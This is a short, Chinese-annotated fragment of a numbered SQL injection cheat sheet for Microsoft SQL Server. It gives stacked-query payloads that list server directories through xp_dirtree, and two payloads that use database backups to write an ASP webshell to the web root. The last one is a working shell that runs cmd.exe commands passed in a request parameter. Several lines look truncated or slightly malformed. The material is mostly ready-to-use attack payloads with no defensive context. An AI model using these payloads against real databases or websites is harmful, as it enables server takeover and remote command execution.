12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree 'c:\' ;and (select top 1 paths from dirs)>0 ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
14.mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values ('% Dim oScript %>'); backup database model to disk='c:\l.asp';
16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values ('%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%>'); backup database model to disk='g:\wwwtest\l.asp';